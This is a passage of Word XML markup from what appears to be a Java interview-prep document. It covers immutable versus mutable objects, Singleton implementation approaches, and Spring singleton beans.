      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26D6B5E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160CDF4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06DF16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7175BE" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16BED54A"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methods for mutability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3209348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Name(String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262FEA5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73CFAC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6D2D23" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C695BD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40F48BC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00A2971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8A88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A62C9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30A9E37"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Employee has mutable fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49645E59"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tter methods (setName and setAge) that allow changes to the state of the object after it is created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A846948"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953"/>
        <w:gridCol w:w="4753"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A37CF1" w:rsidRPr="00CE4B95" w14:paraId="1F45121D" w14:textId="77777777" w:rsidTr="00AA798E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34C7BDAF"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C4A3D6"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BCE2A9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utability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A37CF1" w:rsidRPr="00CE4B95" w14:paraId="72DD0AAC" w14:textId="77777777" w:rsidTr="00AA798E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37D4B6E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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7679A9F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changed after object creation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="347B223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 can be changed after object creation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A37CF1" w:rsidRPr="00CE4B95" w14:paraId="1999C5AE" w14:textId="77777777" w:rsidTr="00AA798E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24EF4F2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BBC5DD"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ly thread-safe because state cannot change.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DA2621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inherently thread-safe; requires synchronization.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A37CF1" w:rsidRPr="00CE4B95" w14:paraId="452A3D60" w14:textId="77777777" w:rsidTr="00AA798E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B4155F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48BAF9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values that should not change, like String, Integer.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DDBD29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objects whose state needs to change, like Employee, Product.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A37CF1" w:rsidRPr="00CE4B95" w14:paraId="29F33127" w14:textId="77777777" w:rsidTr="00AA798E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00815BE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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DAF60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creating new objects for changes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C0654E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memory efficient when modifying existing objects.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A37CF1" w:rsidRPr="00CE4B95" w14:paraId="112FF031" w14:textId="77777777" w:rsidTr="00AA798E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71B170D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F42F9D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Integer, LocalDate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0777923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StringBuilder</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="771E367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mmutability or Mutability?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1CECBD"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should be used when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B309C5"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represents a constant value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248A8EC1"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needs to be thread-safe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729340D3"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predictability and security in your objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162AE022"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should be used when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E52709"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s state needs to change after creation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43173DF7"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is a consideration, and you want to reuse the same object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB10152"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worry about thread safety (or you handle it with synchronization).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8CA9C4"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mmutability vs. Mutability in Real-world Scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41598B29"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le Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A Person class where you store someone's name, and once the person is created, you don't want the name or other attributes to change.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233C7E43"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 Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A BankAccount class where you need to change the balance after every transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F031DF6" w14:textId="4220B25D" w:rsidR="00342FA5"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re objects whose state cannot be changed once they are created, while </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mutable objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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13C79">
          <v:rect id="_x0000_i1226" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8410B9" w14:textId="1DFEC70F" w:rsidR="00EB7E74" w:rsidRPr="00CE4B95" w:rsidRDefault="0039480A" w:rsidP="00A37CF1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="81" w:name="_Toc197867295"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Custom implementation of Singleton beans</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E74" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
    </w:p>
    <w:p w14:paraId="00B1D159" w14:textId="60B37F4A" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80" w:rsidP="00826529">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Beans in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B8F6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Pattern in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F41C0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ustom implementation of a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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3870CDA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Singleton:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8E0B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created even before it is accessed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165C488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D5735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agerly initialize the instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B668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01C2E8C9" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D6918A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33E26F0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10CADD5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51999B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0CE7FD9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F8662B" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6674511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1756E40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B7694C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F36143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B198B5" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="403C29B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5F19937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733B46B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4140E4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749E1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2ED6B" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30BAF9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100C8A2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1CCB9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07BC30E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9AC28B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3CA1D8E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0BF90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5C6D5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6ADB4B24"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the class is loaded (instance is created as a static final variable).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DE8841"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stance() provides the global access to the singleton instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691E2045"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simple and thread-safe, but the instance is created even if it's not used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C8DE3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Singleton (Thread-Safe):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C02CEF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zy initialization, the singleton instance is created only when it is first needed. However, we need to ensure thread-safety to prevent multiple threads from creating the instance simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C97B9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Singleton {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6696543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latile variable to ensure visibility across threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3029F3C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547A4122" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71218A6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2EC724C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8D9AE7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4208025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484DE8D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EB67C2" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34F878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uble-Checked Locking for thread-safety and lazy initialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B42563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AF317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AD3FCE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119A646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B0B145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317512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1040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48F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376C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C919DA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59907F" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C090B8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120C77D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035E2A4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E87CD7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E21D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92BE72" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BA0FA6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09B3E7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BFA45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34116BD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1B63BC3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5C38C6B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2C964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8CF66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50D6CA5A"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xml:space="preserve"> ensures that the instance is properly visible to all threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1DCA37"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checked locking is used to make sure that the instance is created only once, and subsequent accesses are faster without synchronization overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E392EC"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efficient because it defers the instantiation until the first time getInstance() is called, and it ensures thread-safety.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558833A3"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Singleton with Static Inner Class):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6531CE2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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java's class loading mechanism</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and ensures thread-safety while still being lazy-loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BDA0A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FC815C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39F7821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74601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03B722B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23BCB1A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F863AF" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C14E86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inner class responsible for holding the singleton instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192450E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214031B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is the instance that gets created only when the class is loaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C1039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25B483B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2DC99E" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C9C66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671413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082A38E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56D4BA9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75587" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4668DCA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3FE4FC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EB2102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202304A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776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77BC3" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23F3B75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57CD53B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11FF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7C86B8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74E56F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36BB9D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C470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F95B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0BC04170"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SingletonHelper class is loaded for the first time, and this happens only when the getInstance() method is called.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699B2DFE"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xml:space="preserve"> are handled automatically by the JVM, ensuring that the instance is created only once and in a thread-safe manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01404DFB"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is preferred for implementing singletons in modern Java applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFC4E7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4"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A37CF1" w:rsidRPr="00CE4B95" w14:paraId="6DBEFD10" w14:textId="77777777" w:rsidTr="00262B80">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C5AA1C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BFDAC12"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37CF1" w:rsidRPr="00CE4B95" w14:paraId="3B66BEC0" w14:textId="77777777" w:rsidTr="00262B80">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52FF367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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23D8489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of class loading. Simple but does not optimize for performance as the instance is always created even if it’s not used.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A37CF1" w:rsidRPr="00CE4B95" w14:paraId="2E1229C4" w14:textId="77777777" w:rsidTr="00262B80">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FB08E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Thread-Safe)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6346CC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needed, but thread-safety is managed with synchronization.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A37CF1" w:rsidRPr="00CE4B95" w14:paraId="13B4152E" w14:textId="77777777" w:rsidTr="00262B80">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09D90F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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6743161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the preferred way of implementing Singleton because it is both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loaded</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> without needing synchronization. It uses the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mechanism.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E9D337D"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ingleton Beans in a Spring Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCD41E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BDAC9F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Bean {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6382127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 in Spring context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100C53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3F9912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 in Spring!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5841B5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D7C63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DB26FB" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25735BA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558FE1C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0BD617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ining the singleton bean in Spring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F52E1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19B324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ingletonBean singletonBean() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087A31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SingletonBean();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C254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2FAFA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73542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lusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27924C27"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Singleton implementation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is useful when you need to control how and when your class instances are created, as in the case of database connections, logging, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32804D09"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s Singleton Beans</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> offer a more automatic and convenient approach, where Spring takes care of the bean lifecycle, and you can simply define beans and their dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F18161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ing on the use case, you can choose the most appropriate Singleton implementation method to ensure your code is efficient, thread-safe, and maintainable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC22265" w14:textId="6906E8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27" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F2066D" w14:textId="689DA590" w:rsidR="00EB7E74" w:rsidRPr="00CE4B95" w:rsidRDefault="0039480A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="82" w:name="_Toc197867296"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the default scope of beans</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E74" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="82"/>
    </w:p>
